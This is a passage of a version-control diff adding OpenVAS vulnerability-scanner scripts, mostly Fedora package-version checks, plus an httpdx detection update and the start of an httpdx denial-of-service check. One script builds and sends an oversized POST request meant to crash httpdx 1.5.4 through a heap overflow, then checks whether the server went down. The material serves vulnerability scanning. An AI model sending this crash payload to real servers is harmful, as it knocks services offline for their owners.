+
+ Affected Software/OS:
+ thunderbird on Fedora 16
+
+ Fix: Please Install the Updated Packages.
+
+ References:
+ http://lists.fedoraproject.org/pipermail/package-announce/2012-July/084178.html ";
+
+if(description)
+{
+ script_id(864561);
+ script_version("$Revision$");
+ script_tag(name:"check_type", value:"authenticated package test");
+ script_tag(name:"last_modification", value:"$Date$");
+ script_tag(name:"creation_date", value:"2012-07-26 11:09:15 +0530 (Thu, 26 Jul 2012)");
+ script_tag(name:"cvss_base", value:"7.5");
+ script_tag(name:"cvss_base_vector", value:"AV:N/AC:L/Au:N/C:P/I:P/A:P");
+ script_tag(name:"risk_factor", value:"High");
+ script_xref(name: "FEDORA", value: "2012-10822");
+ script_name("Fedora Update for thunderbird FEDORA-2012-10822");
+
+ script_description(desc);
+ script_summary("Check for the Version of thunderbird");
+ script_category(ACT_GATHER_INFO);
+ script_copyright("Copyright (c) 2012 Greenbone Networks GmbH");
+ script_family("Fedora Local Security Checks");
+ script_dependencies("gather-package-list.nasl");
+ script_mandatory_keys("HostDetails/OS/cpe:/o:fedoraproject:fedora", "login/SSH/success", "ssh/login/release");
+ exit(0);
+}
+
+
+include("pkg-lib-rpm.inc");
+include("revisions-lib.inc");
+
+release = get_kb_item("ssh/login/release");
+
+res = "";
+if(release == NULL){
+ exit(0);
+}
+
+if(release == "FC16")
+{
+
+ if ((res = isrpmvuln(pkg:"thunderbird", rpm:"thunderbird~14.0~1.fc16", rls:"FC16")) != NULL)
+ {
+ security_hole(data:res + '\n' + desc);
+ exit(0);
+ }
+
+ if (__pkg_match) exit(99); # Not vulnerable.
+ exit(0);
+}
Property changes on: trunk/openvas-plugins/scripts/gb_fedora_2012_10822_thunderbird_fc16.nasl
___________________________________________________________________
Added: svn:keywords
+ Revision Date Id
Added: trunk/openvas-plugins/scripts/gb_fedora_2012_10822_xulrunner_fc16.nasl
===================================================================
--- trunk/openvas-plugins/scripts/gb_fedora_2012_10822_xulrunner_fc16.nasl (rev 0)
+++ trunk/openvas-plugins/scripts/gb_fedora_2012_10822_xulrunner_fc16.nasl 2012-07-31 13:07:25 UTC (rev 13810)
@@ -0,0 +1,89 @@
+###############################################################################
+# OpenVAS Vulnerability Test
+#
+# Fedora Update for xulrunner FEDORA-2012-10822
+#
+# Authors:
+# System Generated Check
+#
+# Copyright:
+# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net
+#
+# This program is free software; you can redistribute it and/or modify
+# it under the terms of the GNU General Public License version 2
+# (or any later version), as published by the Free Software Foundation.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
+###############################################################################
+
+ desc = "
+
+ Vulnerability Insight:
+ XULRunner is a Mozilla runtime package that can be used to bootstrap XUL+XPCOM
+ applications that are as rich as Firefox and Thunderbird. It provides mechanisms
+ for installing, upgrading, and uninstalling these applications. XULRunner also
+ provides libxul, a solution which allows the embedding of Mozilla technologies
+ in other projects and products.
+
+
+ Affected Software/OS:
+ xulrunner on Fedora 16
+
+ Fix: Please Install the Updated Packages.
+
+ References:
+ http://lists.fedoraproject.org/pipermail/package-announce/2012-July/084176.html ";
+
+if(description)
+{
+ script_id(864563);
+ script_version("$Revision$");
+ script_tag(name:"check_type", value:"authenticated package test");
+ script_tag(name:"last_modification", value:"$Date$");
+ script_tag(name:"creation_date", value:"2012-07-26 11:09:15 +0530 (Thu, 26 Jul 2012)");
+ script_tag(name:"cvss_base", value:"7.5");
+ script_tag(name:"cvss_base_vector", value:"AV:N/AC:L/Au:N/C:P/I:P/A:P");
+ script_tag(name:"risk_factor", value:"High");
+ script_xref(name: "FEDORA", value: "2012-10822");
+ script_name("Fedora Update for xulrunner FEDORA-2012-10822");
+
+ script_description(desc);
+ script_summary("Check for the Version of xulrunner");
+ script_category(ACT_GATHER_INFO);
+ script_copyright("Copyright (c) 2012 Greenbone Networks GmbH");
+ script_family("Fedora Local Security Checks");
+ script_dependencies("gather-package-list.nasl");
+ script_mandatory_keys("HostDetails/OS/cpe:/o:fedoraproject:fedora", "login/SSH/success", "ssh/login/release");
+ exit(0);
+}
+
+
+include("pkg-lib-rpm.inc");
+include("revisions-lib.inc");
+
+release = get_kb_item("ssh/login/release");
+
+res = "";
+if(release == NULL){
+ exit(0);
+}
+
+if(release == "FC16")
+{
+
+ if ((res = isrpmvuln(pkg:"xulrunner", rpm:"xulrunner~14.0.1~3.fc16", rls:"FC16")) != NULL)
+ {
+ security_hole(data:res + '\n' + desc);
+ exit(0);
+ }
+
+ if (__pkg_match) exit(99); # Not vulnerable.
+ exit(0);
+}
Property changes on: trunk/openvas-plugins/scripts/gb_fedora_2012_10822_xulrunner_fc16.nasl
___________________________________________________________________
Added: svn:keywords
+ Revision Date Id
Added: trunk/openvas-plugins/scripts/gb_fedora_2012_10829_seamonkey_fc16.nasl
===================================================================
--- trunk/openvas-plugins/scripts/gb_fedora_2012_10829_seamonkey_fc16.nasl (rev 0)
+++ trunk/openvas-plugins/scripts/gb_fedora_2012_10829_seamonkey_fc16.nasl 2012-07-31 13:07:25 UTC (rev 13810)
@@ -0,0 +1,89 @@
+###############################################################################
+# OpenVAS Vulnerability Test
+#
+# Fedora Update for seamonkey FEDORA-2012-10829
+#
+# Authors:
+# System Generated Check
+#
+# Copyright:
+# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net
+#
+# This program is free software; you can redistribute it and/or modify
+# it under the terms of the GNU General Public License version 2
+# (or any later version), as published by the Free Software Foundation.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
+###############################################################################
+
+ desc = "
+
+ Vulnerability Insight:
+ SeaMonkey is an all-in-one Internet application suite. It includes
+ a browser, mail/news client, IRC client, JavaScript debugger, and
+ a tool to inspect the DOM for web pages. It is derived from the
+ application formerly known as Mozilla Application Suite.
+
+
+ Affected Software/OS:
+ seamonkey on Fedora 16
+
+ Fix: Please Install the Updated Packages.
+
+ References:
+ http://lists.fedoraproject.org/pipermail/package-announce/2012-July/084243.html ";
+
+if(description)
+{
+ script_id(864569);
+ script_version("$Revision$");
+ script_tag(name:"check_type", value:"authenticated package test");
+ script_tag(name:"last_modification", value:"$Date$");
+ script_tag(name:"creation_date", value:"2012-07-30 11:18:01 +0530 (Mon, 30 Jul 2012)");
+ script_tag(name:"cvss_base", value:"5.0");
+ script_tag(name:"cvss_base_vector", value:"AV:N/AC:L/Au:N/C:P/I:N/A:N");
+ script_tag(name:"risk_factor", value:"Medium");
+
+ script_xref(name: "FEDORA", value: "2012-10829");
+ script_name("Fedora Update for seamonkey FEDORA-2012-10829");
+
+ script_description(desc);
+ script_summary("Check for the Version of seamonkey");
+ script_category(ACT_GATHER_INFO);
+ script_copyright("Copyright (c) 2012 Greenbone Networks GmbH");
+ script_family("Fedora Local Security Checks");
+ script_dependencies("gather-package-list.nasl");
+ script_mandatory_keys("HostDetails/OS/cpe:/o:fedoraproject:fedora", "login/SSH/success", "ssh/login/release");
+ exit(0);
+}
+
+
+include("pkg-lib-rpm.inc");
+include("revisions-lib.inc");
+
+release = get_kb_item("ssh/login/release");
+
+res = "";
+if(release == NULL){
+ exit(0);
+}
+
+if(release == "FC16")
+{
+
+ if ((res = isrpmvuln(pkg:"seamonkey", rpm:"seamonkey~2.11~1.fc16", rls:"FC16")) != NULL)
+ {
+ security_warning(data:res + '\n' + desc);
+ exit(0);
+ }
+
+ if (__pkg_match) exit(99); # Not vulnerable.
+ exit(0);
+}
Property changes on: trunk/openvas-plugins/scripts/gb_fedora_2012_10829_seamonkey_fc16.nasl
___________________________________________________________________
Added: svn:keywords
+ Revision Date Id
Added: trunk/openvas-plugins/scripts/gb_fedora_2012_10887_nsd_fc16.nasl
===================================================================
--- trunk/openvas-plugins/scripts/gb_fedora_2012_10887_nsd_fc16.nasl (rev 0)
+++ trunk/openvas-plugins/scripts/gb_fedora_2012_10887_nsd_fc16.nasl 2012-07-31 13:07:25 UTC (rev 13810)
@@ -0,0 +1,89 @@
+###############################################################################
+# OpenVAS Vulnerability Test
+#
+# Fedora Update for nsd FEDORA-2012-10887
+#
+# Authors:
+# System Generated Check
+#
+# Copyright:
+# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net
+#
+# This program is free software; you can redistribute it and/or modify
+# it under the terms of the GNU General Public License version 2
+# (or any later version), as published by the Free Software Foundation.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
+###############################################################################
+
+ desc = "
+
+ Vulnerability Insight:
+ NSD is a complete implementation of an authoritative DNS name server.
+ For further information about what NSD is and what NSD is not please
+ consult the REQUIREMENTS document which is a part of this distribution
+ (thanks to Olaf).
+
+
+ Affected Software/OS:
+ nsd on Fedora 16
+
+ Fix: Please Install the Updated Packages.
+
+ References:
+ http://lists.fedoraproject.org/pipermail/package-announce/2012-July/084372.html ";
+
+if(description)
+{
+ script_id(864577);
+ script_version("$Revision$");
+ script_tag(name:"check_type", value:"authenticated package test");
+ script_tag(name:"last_modification", value:"$Date$");
+ script_tag(name:"creation_date", value:"2012-07-30 11:18:13 +0530 (Mon, 30 Jul 2012)");
+ script_cve_id("CVE-2012-2978");
+ script_tag(name:"cvss_base", value:"5.0");
+ script_tag(name:"cvss_base_vector", value:"AV:N/AC:L/Au:N/C:N/I:N/A:P");
+ script_tag(name:"risk_factor", value:"Medium");
+ script_xref(name: "FEDORA", value: "2012-10887");
+ script_name("Fedora Update for nsd FEDORA-2012-10887");
+
+ script_description(desc);
+ script_summary("Check for the Version of nsd");
+ script_category(ACT_GATHER_INFO);
+ script_copyright("Copyright (c) 2012 Greenbone Networks GmbH");
+ script_family("Fedora Local Security Checks");
+ script_dependencies("gather-package-list.nasl");
+ script_mandatory_keys("HostDetails/OS/cpe:/o:fedoraproject:fedora", "login/SSH/success", "ssh/login/release");
+ exit(0);
+}
+
+
+include("pkg-lib-rpm.inc");
+include("revisions-lib.inc");
+
+release = get_kb_item("ssh/login/release");
+
+res = "";
+if(release == NULL){
+ exit(0);
+}
+
+if(release == "FC16")
+{
+
+ if ((res = isrpmvuln(pkg:"nsd", rpm:"nsd~3.2.12~1.fc16", rls:"FC16")) != NULL)
+ {
+ security_warning(data:res + '\n' + desc);
+ exit(0);
+ }
+
+ if (__pkg_match) exit(99); # Not vulnerable.
+ exit(0);
+}
Property changes on: trunk/openvas-plugins/scripts/gb_fedora_2012_10887_nsd_fc16.nasl
___________________________________________________________________
Added: svn:keywords
+ Revision Date Id
Added: trunk/openvas-plugins/scripts/gb_fedora_2012_10897_puppet_fc16.nasl
===================================================================
--- trunk/openvas-plugins/scripts/gb_fedora_2012_10897_puppet_fc16.nasl (rev 0)
+++ trunk/openvas-plugins/scripts/gb_fedora_2012_10897_puppet_fc16.nasl 2012-07-31 13:07:25 UTC (rev 13810)
@@ -0,0 +1,91 @@
+###############################################################################
+# OpenVAS Vulnerability Test
+#
+# Fedora Update for puppet FEDORA-2012-10897
+#
+# Authors:
+# System Generated Check
+#
+# Copyright:
+# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net
+#
+# This program is free software; you can redistribute it and/or modify
+# it under the terms of the GNU General Public License version 2
+# (or any later version), as published by the Free Software Foundation.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
+###############################################################################
+
+ desc = "
+
+ Vulnerability Insight:
+ Puppet lets you centrally manage every important aspect of your system using a
+ cross-platform specification language that manages all the separate elements
+ normally aggregated in different files, like users, cron jobs, and hosts,
+ along with obviously discrete elements like packages, services, and files.
+
+
+ Affected Software/OS:
+ puppet on Fedora 16
+
+ Fix: Please Install the Updated Packages.
+
+ References:
+ http://lists.fedoraproject.org/pipermail/package-announce/2012-July/084309.html ";
+
+if(description)
+{
+ script_id(864568);
+ script_version("$Revision$");
+ script_tag(name:"check_type", value:"authenticated package test");
+ script_tag(name:"last_modification", value:"$Date$");
+ script_tag(name:"creation_date", value:"2012-07-30 11:17:43 +0530 (Mon, 30 Jul 2012)");
+ script_cve_id("CVE-2012-3866", "CVE-2012-3864", "CVE-2012-3865", "CVE-2012-3867",
+ "CVE-2012-1986", "CVE-2012-1987", "CVE-2012-1988", "CVE-2012-1053",
+ "CVE-2012-1054", "CVE-2011-3872");
+ script_tag(name:"cvss_base", value:"6.9");
+ script_tag(name:"cvss_base_vector", value:"AV:L/AC:M/Au:N/C:C/I:C/A:C");
+ script_tag(name:"risk_factor", value:"High");
+ script_xref(name: "FEDORA", value: "2012-10897");
+ script_name("Fedora Update for puppet FEDORA-2012-10897");
+
+ script_description(desc);
+ script_summary("Check for the Version of puppet");
+ script_category(ACT_GATHER_INFO);
+ script_copyright("Copyright (c) 2012 Greenbone Networks GmbH");
+ script_family("Fedora Local Security Checks");
+ script_dependencies("gather-package-list.nasl");
+ script_mandatory_keys("HostDetails/OS/cpe:/o:fedoraproject:fedora", "login/SSH/success", "ssh/login/release");
+ exit(0);
+}
+
+
+include("pkg-lib-rpm.inc");
+include("revisions-lib.inc");
+
+release = get_kb_item("ssh/login/release");
+
+res = "";
+if(release == NULL){
+ exit(0);
+}
+
+if(release == "FC16")
+{
+
+ if ((res = isrpmvuln(pkg:"puppet", rpm:"puppet~2.6.17~2.fc16", rls:"FC16")) != NULL)
+ {
+ security_hole(data:res + '\n' + desc);
+ exit(0);
+ }
+
+ if (__pkg_match) exit(99); # Not vulnerable.
+ exit(0);
+}
Property changes on: trunk/openvas-plugins/scripts/gb_fedora_2012_10897_puppet_fc16.nasl
___________________________________________________________________
Added: svn:keywords
+ Revision Date Id
Added: trunk/openvas-plugins/scripts/gb_fedora_2012_10929_bacula_fc16.nasl
===================================================================
--- trunk/openvas-plugins/scripts/gb_fedora_2012_10929_bacula_fc16.nasl (rev 0)
+++ trunk/openvas-plugins/scripts/gb_fedora_2012_10929_bacula_fc16.nasl 2012-07-31 13:07:25 UTC (rev 13810)
@@ -0,0 +1,91 @@
+###############################################################################
+# OpenVAS Vulnerability Test
+#
+# Fedora Update for bacula FEDORA-2012-10929
+#
+# Authors:
+# System Generated Check
+#
+# Copyright:
+# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net
+#
+# This program is free software; you can redistribute it and/or modify
+# it under the terms of the GNU General Public License version 2
+# (or any later version), as published by the Free Software Foundation.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
+###############################################################################
+
+ desc = "
+
+ Vulnerability Insight:
+ Bacula is a set of programs that allow you to manage the backup,
+ recovery, and verification of computer data across a network of
+ different computers. It is based on a client/server architecture and is
+ efficient and relatively easy to use, while offering many advanced
+ storage management features that make it easy to find and recover lost
+ or damaged files.
+
+
+ Affected Software/OS:
+ bacula on Fedora 16
+
+ Fix: Please Install the Updated Packages.
+
+ References:
+ http://lists.fedoraproject.org/pipermail/package-announce/2012-July/084347.html ";
+
+if(description)
+{
+ script_id(864575);
+ script_version("$Revision$");
+ script_tag(name:"check_type", value:"authenticated package test");
+ script_tag(name:"last_modification", value:"$Date$");
+ script_tag(name:"creation_date", value:"2012-07-30 11:18:10 +0530 (Mon, 30 Jul 2012)");
+ script_cve_id("CVE-2008-5373");
+ script_tag(name:"cvss_base", value:"6.9");
+ script_tag(name:"cvss_base_vector", value:"AV:L/AC:M/Au:N/C:C/I:C/A:C");
+ script_tag(name:"risk_factor", value:"High");
+ script_xref(name: "FEDORA", value: "2012-10929");
+ script_name("Fedora Update for bacula FEDORA-2012-10929");
+
+ script_description(desc);
+ script_summary("Check for the Version of bacula");
+ script_category(ACT_GATHER_INFO);
+ script_copyright("Copyright (c) 2012 Greenbone Networks GmbH");
+ script_family("Fedora Local Security Checks");
+ script_dependencies("gather-package-list.nasl");
+ script_mandatory_keys("HostDetails/OS/cpe:/o:fedoraproject:fedora", "login/SSH/success", "ssh/login/release");
+ exit(0);
+}
+
+
+include("pkg-lib-rpm.inc");
+include("revisions-lib.inc");
+
+release = get_kb_item("ssh/login/release");
+
+res = "";
+if(release == NULL){
+ exit(0);
+}
+
+if(release == "FC16")
+{
+
+ if ((res = isrpmvuln(pkg:"bacula", rpm:"bacula~5.0.3~31.fc16", rls:"FC16")) != NULL)
+ {
+ security_hole(data:res + '\n' + desc);
+ exit(0);
+ }
+
+ if (__pkg_match) exit(99); # Not vulnerable.
+ exit(0);
+}
Property changes on: trunk/openvas-plugins/scripts/gb_fedora_2012_10929_bacula_fc16.nasl
___________________________________________________________________
Added: svn:keywords
+ Revision Date Id
Added: trunk/openvas-plugins/scripts/gb_fedora_2012_10934_dropbear_fc16.nasl
===================================================================
--- trunk/openvas-plugins/scripts/gb_fedora_2012_10934_dropbear_fc16.nasl (rev 0)
+++ trunk/openvas-plugins/scripts/gb_fedora_2012_10934_dropbear_fc16.nasl 2012-07-31 13:07:25 UTC (rev 13810)
@@ -0,0 +1,88 @@
+###############################################################################
+# OpenVAS Vulnerability Test
+#
+# Fedora Update for dropbear FEDORA-2012-10934
+#
+# Authors:
+# System Generated Check
+#
+# Copyright:
+# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net
+#
+# This program is free software; you can redistribute it and/or modify
+# it under the terms of the GNU General Public License version 2
+# (or any later version), as published by the Free Software Foundation.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
+###############################################################################
+
+ desc = "
+
+ Vulnerability Insight:
+ Dropbear is a relatively small SSH 2 server and client. Dropbear
+ is particularly useful for "embedded"-type Linux (or other Unix)
+ systems, such as wireless routers.
+
+
+ Affected Software/OS:
+ dropbear on Fedora 16
+
+ Fix: Please Install the Updated Packages.
+
+ References:
+ http://lists.fedoraproject.org/pipermail/package-announce/2012-July/084354.html ";
+
+if(description)
+{
+ script_id(864567);
+ script_version("$Revision$");
+ script_tag(name:"check_type", value:"authenticated package test");
+ script_tag(name:"last_modification", value:"$Date$");
+ script_tag(name:"creation_date", value:"2012-07-30 11:17:42 +0530 (Mon, 30 Jul 2012)");
+ script_cve_id("CVE-2012-0920");
+ script_tag(name:"cvss_base", value:"7.1");
+ script_tag(name:"cvss_base_vector", value:"AV:N/AC:H/Au:S/C:C/I:C/A:C");
+ script_tag(name:"risk_factor", value:"High");
+ script_xref(name: "FEDORA", value: "2012-10934");
+ script_name("Fedora Update for dropbear FEDORA-2012-10934");
+
+ script_description(desc);
+ script_summary("Check for the Version of dropbear");
+ script_category(ACT_GATHER_INFO);
+ script_copyright("Copyright (c) 2012 Greenbone Networks GmbH");
+ script_family("Fedora Local Security Checks");
+ script_dependencies("gather-package-list.nasl");
+ script_mandatory_keys("HostDetails/OS/cpe:/o:fedoraproject:fedora", "login/SSH/success", "ssh/login/release");
+ exit(0);
+}
+
+
+include("pkg-lib-rpm.inc");
+include("revisions-lib.inc");
+
+release = get_kb_item("ssh/login/release");
+
+res = "";
+if(release == NULL){
+ exit(0);
+}
+
+if(release == "FC16")
+{
+
+ if ((res = isrpmvuln(pkg:"dropbear", rpm:"dropbear~0.55~1.fc16", rls:"FC16")) != NULL)
+ {
+ security_hole(data:res + '\n' + desc);
+ exit(0);
+ }
+
+ if (__pkg_match) exit(99); # Not vulnerable.
+ exit(0);
+}
Property changes on: trunk/openvas-plugins/scripts/gb_fedora_2012_10934_dropbear_fc16.nasl
___________________________________________________________________
Added: svn:keywords
+ Revision Date Id
Added: trunk/openvas-plugins/scripts/gb_httpdx_post_req_bof_vuln.nasl
===================================================================
--- trunk/openvas-plugins/scripts/gb_httpdx_post_req_bof_vuln.nasl (rev 0)
+++ trunk/openvas-plugins/scripts/gb_httpdx_post_req_bof_vuln.nasl 2012-07-31 13:07:25 UTC (rev 13810)
@@ -0,0 +1,106 @@
+##############################################################################
+# OpenVAS Vulnerability Test
+# $Id$
+#
+# httpdx 'POST' request Heap Based Buffer Overflow Vulnerability
+#
+# Authors:
+# Sooraj KS <kssooraj at secpod.com>
+#
+# Copyright:
+# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net
+#
+# This program is free software; you can redistribute it and/or modify
+# it under the terms of the GNU General Public License version 2
+# (or any later version), as published by the Free Software Foundation.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
+###############################################################################
+
+SCRIPT_OID = "1.3.6.1.4.1.25623.1.0.802663";
+CPE = "cpe:/a:jasper:httpdx";
+
+if(description)
+{
+ script_oid(SCRIPT_OID);
+ script_version("$Revision$");
+ script_tag(name:"cvss_base", value:"10.0");
+ script_tag(name:"cvss_base_vector", value:"AV:N/AC:L/Au:N/C:C/I:C/A:C");
+ script_tag(name:"risk_factor", value:"Critical");
+ script_tag(name:"last_modification", value:"$Date$");
+ script_tag(name:"creation_date", value:"2012-07-30 12:12:12 +0530 (Mon, 30 Jul 2012)");
+ script_name("httpdx 'POST' request Heap Based Buffer Overflow Vulnerability");
+ desc = "
+ Overview: This host is running httpdx and is prone to buffer overflow
+ vulnerability.
+
+ Vulnerability Insight:
+ The flaw is caused due to a boundary error when processing http POST requests
+ and can be exploited to cause a heap based buffer overflow via a specially
+ crafted packet.
+
+ Impact:
+ Successful exploitation will allow remote attackers to execute arbitrary
+ code in the context of the application. Failed attacks will cause denial
+ of service conditions.
+
+ Impact Level: System/Application
+
+ Affected Software/OS:
+ httpdx version 1.5.4
+
+ Fix: No solution or patch is available as on 30th July, 2012. Information
+ regarding this issue will be updated once the solution details are available.
+ For updates refer, http://sourceforge.net/projects/httpdx/
+
+ References:
+ http://www.exploit-db.com/exploits/20120 ";
+
+ script_description(desc);
+ script_summary("Determine if httpdx is prone to a buffer overflow");
+ script_category(ACT_DENIAL);
+ script_copyright("Copyright (c) 2012 Greenbone Networks GmbH");
+ script_family("Buffer overflow");
+ script_dependencies("gb_httpdx_server_detect.nasl");
+ script_require_keys("httpdx/installed");
+ script_require_ports("Services/www",80);
+ exit(0);
+}
+
+
+include("http_func.inc");
+include("host_details.inc");
+
+## Variable Initialization
+port = 0;
+req = "";
+res = "";
+
+## Get HTTP Port
+port = get_app_port(cpe:CPE, nvt:SCRIPT_OID);
+if(! port){
+ exit(0);
+}
+
+## Construct attack Request
+crash = crap(data: "A", length: 1036);
+req = string("POST /test.pl HTTP/1.0\r\n",
+ "Host: ", get_host_name(), "\r\n",
+ "Content-Length: 1023\r\n",
+ "Content-Type: text\r\n",
+ "\r\n", crash);
+
+## Send attack request
+res = http_send_recv(port:port, data:req);
+
+## Confirm httpdx is dead
+if(http_is_dead(port:port)){
+ security_hole(port);
+}
Property changes on: trunk/openvas-plugins/scripts/gb_httpdx_post_req_bof_vuln.nasl
___________________________________________________________________
Added: svn:keywords
+ Revision Date Id
Modified: trunk/openvas-plugins/scripts/gb_httpdx_server_detect.nasl
===================================================================
--- trunk/openvas-plugins/scripts/gb_httpdx_server_detect.nasl 2012-07-31 08:12:11 UTC (rev 13809)
+++ trunk/openvas-plugins/scripts/gb_httpdx_server_detect.nasl 2012-07-31 13:07:25 UTC (rev 13810)
@@ -24,38 +24,44 @@
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
###############################################################################
+SCRIPT_OID = "1.3.6.1.4.1.25623.1.0.800960";
+
if(description)
{
- script_id(800960);
+ script_oid(SCRIPT_OID);
script_version("$Revision$");
script_tag(name:"last_modification", value:"$Date$");
script_tag(name:"creation_date", value:"2009-10-23 16:18:41 +0200 (Fri, 23 Oct 2009)");
script_tag(name:"cvss_base", value:"0.0");
script_tag(name:"risk_factor", value:"None");
script_name("httpdx Server Version Detection");
- desc = "
- Overview : This script detects the version of installed httpdx Server
- and saves the result in KB.";
+ script_tag(name:"detection", value:"remote probe");
+ script_description("Detection of httpdx Server.
- script_description(desc);
- script_family("Service detection");
+The script sends a connection request to the server and attempts to
+extract the version number from the reply.");
+
+ script_family("Product detection");
script_category(ACT_GATHER_INFO);
script_copyright("Copyright (C) 2009 Greenbone Networks GmbH");
- script_summary("Set the version of httpdx Server");
+ script_summary("Checks for the presence of httpdx");
script_dependencies("find_service.nes");
script_require_ports("Services/www", "Services/ftp", 80, 21);
exit(0);
}
+include("cpe.inc");
include("ftp_func.inc");
include("http_func.inc");
-include("cpe.inc");
include("host_details.inc");
-## Constant values
-SCRIPT_OID = "1.3.6.1.4.1.25623.1.0.800960";
-SCRIPT_DESC = "httpdx Server Version Detection";
+## Variable Initialization
+ftpPort = 0;
+httpPort = 0;
+banner = "";
+httpdxVer = NULL;
+vers = string("unknown");
httpPort = get_kb_item("Services/www");
if(!httpPort){
@@ -76,20 +82,26 @@
banner = get_kb_item(string("Banner/", port));
}
- if(!isnull(banner) && "httpdx" >< banner)
+ if(banner && "httpdx" >< banner)
{
httpdxVer = eregmatch(pattern:"httpdx.([0-9.]+[a-z]?)", string:banner);
if(!isnull(httpdxVer[1]))
{
set_kb_item(name:"httpdx/" + port + "/Ver", value:httpdxVer[1]);
- security_note(data:"httpdx version " + httpdxVer[1] + " was detected on the host");
-
- ## build cpe and store it as host_detail
- cpe = build_cpe(value:httpdxVer[1], exp:"^([0-9.]+([a-z]+)?)", base:"cpe:/a:jasper:httpdx:");
- if(!isnull(cpe))
- register_host_detail(name:"App", value:cpe, nvt:SCRIPT_OID, desc:SCRIPT_DESC);
+ vers = httpdxVer[1];
+ }
- }
+ set_kb_item(name:"httpdx/installed", value:TRUE);
+
+ ## build cpe and store it as host_detail
+ cpe = build_cpe(value:vers, exp:"^([0-9.]+([a-z]+)?)", base:"cpe:/a:jasper:httpdx:");
+ if(isnull(cpe))
+ cpe = 'cpe:/a:jasper:httpdx';
+
+ register_product(cpe:cpe, location:"/", nvt:SCRIPT_OID, port:port);
+
+ log_message(data: build_detection_report(app:"httpdx", version:vers,
+ install:"/", cpe:cpe, concluded: vers), port:port);
}
}
}
Added: trunk/openvas-plugins/scripts/gb_httpdx_wildcards_remote_dos_vuln.nasl
===================================================================
--- trunk/openvas-plugins/scripts/gb_httpdx_wildcards_remote_dos_vuln.nasl (rev 0)
+++ trunk/openvas-plugins/scripts/gb_httpdx_wildcards_remote_dos_vuln.nasl 2012-07-31 13:07:25 UTC (rev 13810)
@@ -0,0 +1,105 @@
+##############################################################################
+# OpenVAS Vulnerability Test
+# $Id$
+#
+# httpdx Wildcards Remote Denial of Service Vulnerability
+#
+# Authors:
+# Sooraj KS <kssooraj at secpod.com>
+#
+# Copyright:
+# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net
+#
+# This program is free software; you can redistribute it and/or modify
+# it under the terms of the GNU General Public License version 2
+# (or any later version), as published by the Free Software Foundation.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
+###############################################################################
+
+SCRIPT_OID = "1.3.6.1.4.1.25623.1.0.802662";
+CPE = "cpe:/a:jasper:httpdx";
+
+if(description)
+{
+ script_oid(SCRIPT_OID);
+ script_version("$Revision$");
+ script_bugtraq_id(54629);
+ script_tag(name:"cvss_base", value:"5.0");
+ script_tag(name:"cvss_base_vector", value:"AV:N/AC:L/Au:N/C:N/I:N/A:P");
+ script_tag(name:"risk_factor", value:"Medium");
+ script_tag(name:"last_modification", value:"$Date$");
+ script_tag(name:"creation_date", value:"2012-07-27 12:12:12 +0530 (Fri, 27 Jul 2012)");
+ script_name("httpdx Wildcards Remote Denial of Service Vulnerability");
+ desc = "
+ Overview: This host is running httpdx and is prone to denial of service
+ vulnerability.
+
+ Vulnerability Insight:
+ The flaw is caused due to a boundary error when processing certain http
